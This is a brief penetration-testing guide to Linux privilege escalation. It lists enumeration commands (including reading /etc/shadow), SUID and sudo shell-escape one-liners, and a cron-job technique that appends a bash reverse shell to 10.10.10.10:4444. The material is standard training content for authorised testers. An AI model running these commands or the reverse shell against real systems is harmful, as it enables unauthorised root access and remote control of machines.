Key Takeaways
- SUID binaries run with owner privileges—abuse GTFOBins.
- Sudo misconfigs: Check sudo -l for escalation paths.
- Cron jobs: Writable scripts run as root = instant privesc.
- Always run LinPEAS for comprehensive enumeration.
Linux privilege escalation is a core skill for penetration testers. After gaining a foothold as a low-privileged user, these techniques help you become root.
Essential Enumeration
# System info
uname -a
cat /etc/os-release
hostname
# Current user privileges
id
whoami
sudo -l
# Other users
cat /etc/passwd
cat /etc/shadow # If readable = game over
# Network
netstat -tulpn
ss -tulpnSUID Binary Exploitation
# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null
# Check GTFOBins for exploitation:
# Example: SUID on find
find . -exec /bin/sh -p \; -quit
# Example: SUID on vim
vim -c ':!/bin/sh'
# Example: SUID on python
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'Sudo Exploitation
# Check sudo permissions
sudo -l
# Example: (ALL) NOPASSWD: /usr/bin/vim
sudo vim -c ':!/bin/sh'
# Example: (ALL) NOPASSWD: /usr/bin/find
sudo find / -exec /bin/sh \;
# Example: (ALL) NOPASSWD: /usr/bin/awk
sudo awk 'BEGIN {system("/bin/sh")}'Cron Job Abuse
# View cron jobs
cat /etc/crontab
ls -la /etc/cron.d/
ls -la /etc/cron.daily/
# Check for writable scripts
ls -la /path/to/cronscript.sh
# If writable, inject reverse shell
echo 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1' >> /path/to/cronscript.shEssential Tools
- LinPEAS: Comprehensive privesc enumeration script
- LinEnum: Classic Linux enumeration
- pspy: Monitor processes without root
- GTFOBins: Unix binary exploitation database
Frequently Asked Questions
What's the fastest way to check for privesc?
Run
sudo -l first—many machines have misconfigured sudo rules. Then check SUID binaries and run LinPEAS for comprehensive coverage.
Master all privilege escalation vectors.
Windows PrivEsc Guide